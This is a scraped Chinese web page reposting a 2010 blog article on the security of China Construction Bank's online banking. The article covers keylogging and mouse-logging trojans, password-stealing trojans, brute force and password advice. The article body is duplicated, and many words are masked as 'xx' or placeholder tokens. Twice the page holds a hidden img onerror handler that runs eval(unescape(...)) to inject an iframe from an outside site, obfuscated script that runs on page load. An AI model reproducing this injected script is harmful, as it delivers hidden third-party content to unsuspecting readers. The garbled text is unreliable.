建行网上银行安全性研究
[转贴 2010-02-05 20:41:54]
建行网上银行安全性研究
![]()
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zf_200_200.html%20width%3D200%20height%3D200%20frameBorder%3D0%20scrolling%3Dno%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml1%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">
随着前段时间几起网银xx客户资金的案件发生,网上银行安全性问题也成为大家xx的焦点。很多人因为担心资金的安全不愿意用网上银行这种方便快捷的方式,到底我们建行的网上银行的安全系数多少呢?让我来做一个简要的分析。
一、关于签约流程
最近网银被盗案件的发生引起了建行的高度重视,网上银行的安全措施不断增加,其中签约流程方面的变化是{zd0}的。客户签约网上银行业务,需先在建行网站进行注册。网上注册的{dy}布是阅读风险提示,其中列出了多种诈骗的手段,通过客户阅读风险提示,能有效防范通过网络诈骗的方式xx客户资金的行为,避免一些不明真相的客户上当受骗。
客户来柜台做网上银行签约业务,柜员必须向客户核实网上银行的使用目的是否正确,使用地点是否安全,并核对客户所填写的手机号是否为本人所有,通过联网核查系统核实客户的身份证件等,这些措施从源头上保证了客户资金的安全性,确保客户正确使用网上银行,避免一些不法分子钻空子。
二、关于密码
首先,登录网上银行需要客户输入用户昵称/证件号码、登录密码和附加码。无论是有证书客户还是无证书客户,输入正确即可登录建行的网上银行。黑客xx客户密码的方式,总的来说有以下几种:
1. 通过键盘记录xx密码。键盘记录型的木马是一种比较简单的木马。它的原理就是将木马的服务器程序安装到您的计算机上,也是我们通常所说的“中了木马”,这时,您的键盘敲击的操作就会以点子邮件等方式发送给黑客,这是非常危险的。建行的网上银行有一个比较高级的密码输入器(如下图),建议您在操作的时候不要选择“使用键盘输入”,而是通过点击鼠标的方式使用密码键盘器输入,这样可以有效的对付此种木马。
2. 通过记录鼠标动作xx密码。一些别有用心的木马设计者也许会通过分析您在通过密码键盘器输入密码时鼠标点击的位置判断您的网银密码。黑客xx您鼠标点击位置的坐标,通过这些坐标模拟出您的密码的几种可能性,这样很容易就能试出密码。建行网银的这个密码键盘器的一个非常安全的设计就是密码键盘器的上面绿色的部分,十个数字显示的顺序是随机的。这样,黑客即使是xx了鼠标的坐标,也不可能知道您的密码是多少。这就决定了打算靠记录鼠标动作xx密码的黑客xx无法得逞。
3. 密码发送型木马xx密码。此种木马可以找到隐藏密码并把它们发送到指定的信箱。有人喜欢把自己的各种密码以文件的形式存放在计算机中,认为这样方便;还有人喜欢用WINDOWS提供的密码记忆功能,这样就可以不必每次都输入密码了。许多黑客软件可以寻找到这些文件,把它们送到黑客手中。所以提醒各位网银客户注意,尽量不要把密码记在电脑里的某个文件里,如果怕忘记,倒不如记在纸上安全xxx些。
4. 暴利xx密码。所谓的暴利xx可不是指的把电脑砸扁,而是通过一次次的运算试出密码。由于电脑运算的强度可能非常大,极有可能造成您的电脑运行速度减慢,所以称之为暴利xx。由于建行的网上银行每天允许密码输入错误的次数只有两次,而且每次登录都需要输入系统随机产生的验证码,所以暴利xx密码的可能性几乎没有。但还是要提醒大家注意,您的密码长度不要太短,也不要设的太简单,单纯的数字和单纯的字母都更容易被xx。{zh0}是将密码修改为数字和字母结合。
如果按照以上注意事项操作了,可以看出,即使是无证书客户,建行的网上银行也是比较安全的,更何况无证书的客户只能办理查询、小额网上交易等风险较小的业务。
![]()
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zf_250_250.html%20width%3D250%20height%3D250%20frameBorder%3D0%20scrolling%3Dno%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml2%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">
随着前段时间几起网银xx客户资金的案件发生,网上银行安全性问题也成为大家xx的焦点。很多人因为担心资金的安全不愿意用网上银行这种方便快捷的方式,到底我们建行的网上银行的安全系数多少呢?让我来做一个简要的分析。
一、关于签约流程
最近网银被盗案件的发生引起了建行的高度重视,网上银行的安全措施不断增加,其中签约流程方面的变化是{zd0}的。客户签约网上银行业务,需先在建行网站进行注册。网上注册的{dy}布是阅读风险提示,其中列出了多种诈骗的手段,通过客户阅读风险提示,能有效防范通过网络诈骗的方式xx客户资金的行为,避免一些不明真相的客户上当受骗。
客户来柜台做网上银行签约业务,柜员必须向客户核实网上银行的使用目的是否正确,使用地点是否安全,并核对客户所填写的手机号是否为本人所有,通过联网核查系统核实客户的身份证件等,这些措施从源头上保证了客户资金的安全性,确保客户正确使用网上银行,避免一些不法分子钻空子。
二、关于密码
首先,登录网上银行需要客户输入用户昵称/证件号码、登录密码和附加码。无论是有证书客户还是无证书客户,输入正确即可登录建行的网上银行。黑客xx客户密码的方式,总的来说有以下几种:
1. 通过键盘记录xx密码。键盘记录型的木马是一种比较简单的木马。它的原理就是将木马的服务器程序安装到您的计算机上,也是我们通常所说的“中了木马”,这时,您的键盘敲击的操作就会以点子邮件等方式发送给黑客,这是非常危险的。建行的网上银行有一个比较高级的密码输入器(如下图),建议您在操作的时候不要选择“使用键盘输入”,而是通过点击鼠标的方式使用密码键盘器输入,这样可以有效的对付此种木马。
2. 通过记录鼠标动作xx密码。一些别有用心的木马设计者也许会通过分析您在通过密码键盘器输入密码时鼠标点击的位置判断您的网银密码。黑客xx您鼠标点击位置的坐标,通过这些坐标模拟出您的密码的几种可能性,这样很容易就能试出密码。建行网银的这个密码键盘器的一个非常安全的设计就是密码键盘器的上面绿色的部分,十个数字显示的顺序是随机的。这样,黑客即使是xx了鼠标的坐标,也不可能知道您的密码是多少。这就决定了打算靠记录鼠标动作xx密码的黑客xx无法得逞。
3. 密码发送型木马xx密码。此种木马可以找到隐藏密码并把它们发送到指定的信箱。有人喜欢把自己的各种密码以文件的形式存放在计算机中,认为这样方便;还有人喜欢用WINDOWS提供的密码记忆功能,这样就可以不必每次都输入密码了。许多黑客软件可以寻找到这些文件,把它们送到黑客手中。所以提醒各位网银客户注意,尽量不要把密码记在电脑里的某个文件里,如果怕忘记,倒不如记在纸上安全xxx些。
4. 暴利xx密码。所谓的暴利xx可不是指的把电脑砸扁,而是通过一次次的运算试出密码。由于电脑运算的强度可能非常大,极有可能造成您的电脑运行速度减慢,所以称之为暴利xx。由于建行的网上银行每天允许密码输入错误的次数只有两次,而且每次登录都需要输入系统随机产生的验证码,所以暴利xx密码的可能性几乎没有。但还是要提醒大家注意,您的密码长度不要太短,也不要设的太简单,单纯的数字和单纯的字母都更容易被xx。{zh0}是将密码修改为数字和字母结合。
如果按照以上注意事项操作了,可以看出,即使是无证书客户,建行的网上银行也是比较安全的,更何况无证书的客户只能办理查询、小额网上交易等风险较小的业务。
郑重声明:资讯 【建行网上银行安全性研究- xxx资讯- condemn - 和讯博客】由 发布,版权归原作者及其所在单位,其原创性以及文中陈述文字和内容未经(企业库qiyeku.com)证实,请读者仅作参考,并请自行核实相关内容。若本文有侵犯到您的版权, 请你提供相关证明及申请并与我们联系(qiyeku # qq.com)或【在线投诉】,我们审核后将会尽快处理。
—— 相关资讯 ——
